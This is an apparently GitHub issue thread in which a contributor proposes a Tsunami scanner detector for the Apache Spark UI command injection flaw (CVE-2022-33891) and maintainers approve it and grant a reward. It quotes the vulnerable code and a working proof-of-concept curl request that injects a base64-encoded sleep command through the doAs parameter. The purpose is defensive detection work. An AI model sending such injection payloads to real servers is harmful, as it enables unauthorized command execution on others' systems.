OccamsXor
commented
6 months ago Hi @maoning ,
I would like contribute to this PRP request. Can you assign it to me?
Closed maoning closed 5 months ago
OccamsXor
commented
6 months ago Hi @maoning ,
I would like contribute to this PRP request. Can you assign it to me?
maoning
commented
6 months ago Hi @OccamsXor ,
Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:
OccamsXor
commented
6 months ago Hi @maoning , @tooryx ,
I sent the PR regarding the vulnerable configuration to Security Testbeds repository. https://github.com/google/security-testbeds/pull/32
The Apache Spark UI has spark.acls.enable configuration option which provides capability to modify the application according to user's permissions. When the config is true, the vulnerable versions of Spark will check the group membership of the user -which is passed in the ?doAs parameter- using the vulnerable code below:
private def getUnixGroups(username: String): Set[String] = {
val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
// we need to get rid of the trailing "\n" from the result of command execution
Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
}
}Ref: https://github.com/apache/spark/pull/36315/files
Without proper controls, this method allows blind command injection in username parameter, meaning the attacker is not able to see the output of the executed command.
Using the public PoC provided here we can observe the application delays the response 10 seconds:
❯ curl 'http://localhost:8080/?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash`'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 403 User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</title>
</head>
<body><h2>HTTP ERROR 403 User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</h2>
<table>
<tr><th>URI:</th><td>/</td></tr>
<tr><th>STATUS:</th><td>403</td></tr>
<tr><th>MESSAGE:</th><td>User `echo "c2xlZXAgMTAK" | base64 -d | bash` is not authorized to access this page.</td></tr>
<tr><th>SERVLET:</th><td>org.apache.spark.ui.JettyUtils$$anon$1-4ef7e640</td></tr>
</table>
<hr><a href="https://eclipse.org/jetty">Powered by Jetty:// 9.4.36.v20210114</a><hr/>
</body>
</html>We can also observe the sleep command is executed in the container:
The plugin will have these working steps:
?doAs endpoint is returning 403 as expected BLIND_RCE typemaoning
commented
6 months ago Hi @OccamsXor,
Thank you for submitting the testing configs to security-testbeds and providing detailed vuln research. Everything looks good. Please submit our participation form and you can start working on the development.
magl0
commented
6 months ago Hi @OccamsXor,
Your PR has been merged. This usually means a reward will be granted. Google will start the internal QC process and the reward amount will be determined based on the quality of the detector report. Please be patient and allow up to a week for the QC process to finish. You'll be notified once the decision is made.
Thanks!
OccamsXor
commented
5 months ago Are there any updates on this issue @magl0 @maoning ?
maoning
commented
5 months ago Hi @OccamsXor,
Thanks for your contribution, the reward has been granted!
https://github.com/projectdiscovery/nuclei-templates/blob/b686b1aea279093c30b35486db65a0e9917b66c4/http/cves/2022/CVE-2022-33891.yaml#L4
Please use Tsunami's payload generator like https://github.com/google/tsunami-security-scanner-plugins/blob/ab5e8d213fb7975223af338d2fefee6040d2e6ad/google/detectors/rce/ai/cve20236019/src/main/java/com/google/tsunami/plugins/cve20236019/Cve20236019Detector.java#L130-L139 to generate a templated printf string for verification.
Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.